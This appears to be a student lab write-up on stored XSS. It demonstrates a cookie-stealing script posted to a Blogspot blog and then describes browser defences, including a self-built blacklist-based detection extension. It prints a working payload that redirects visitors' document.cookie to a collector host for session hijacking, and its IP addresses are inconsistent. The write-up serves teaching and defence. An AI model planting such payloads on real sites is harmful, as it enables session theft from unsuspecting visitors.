According to CERT coordination center, a web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have complete control over how the client browser user interprets these pages. Whereas web sites that generate dynamic pages do not have complete control over how the client browser interprets these pages. If untrusted content can be introduced into a dynamic page, neither the server nor the client has enough information to detect this malicious activity.
Stored XSS Attack
Stealing cookies using XSS
A cookie can be retrieved from the browser with the script ‘document.cookie’. Blogs hosted by blogspot.com are vulnerable to XSS attacks. For purpose of cookie stealing a blog hosted by blogspot.com was used and the following XSS vector was used <script>document.location=’http://172.16.16.10/labproj/insert.php/?vector=’+document.cookie</script>.
• This script was posted in a blog http://labxssproj.blogspot.com hosted by blogspot.com.
• 172.16.16.106 is the IP address of the machine hosting insert.php and the database storing cookie values.
• Whenever any user visits http://labxssproj.blogspot.com, they will get redirected to http://172.16.16.10/labproj/ insert.php/?vector=’+document.cookie, and their cookie will be saved in the database of the machine 172.16.16.106. This cookie can then be used for session hijacking.
Available Mozilla Firefox Extensions
YesScript Firefox Extension
noXSS Firefox Extension
noXSS is a Firefox extension that protects against reflective XSS. Basically noXSS checks all executed scripts against relevant request data. If a certain amount of request data is found within a script noXSS assumes that a XSS attempt has occurred and prevents the execution of the whole script.
NoScript Firefox Extension
For stored XSS detection an extension for Mozilla Firefox called ‘StoredXSSdetector’ was created. This extension maintains a blacklist of XSS vectors and commonly used strings of characters in XSS attacks such as document.cookie. The Blacklist is stored in a database. After a page is rendered in browser, the extension will check for all the script tags in the browser.
Using DOM properties of HTML, the extension checks if the content of <script> elements contain any of the XSS vectors given in database. The getElementsByTagName() returns all elements with a specified tag name. This node access method can be used for finding all the tags in the web page. The easiest way to get or modify the content of an element is by using the innerHTML property. It can also be used to view the source of a page that has been dynamically modified. The innerHTML property can be used to view contents of all script tags and check them against the blacklist of XSS vectors. The extension generates alerts warning user of the XSS vector present in the rendered webpage, hence making the user aware of the XSS attack.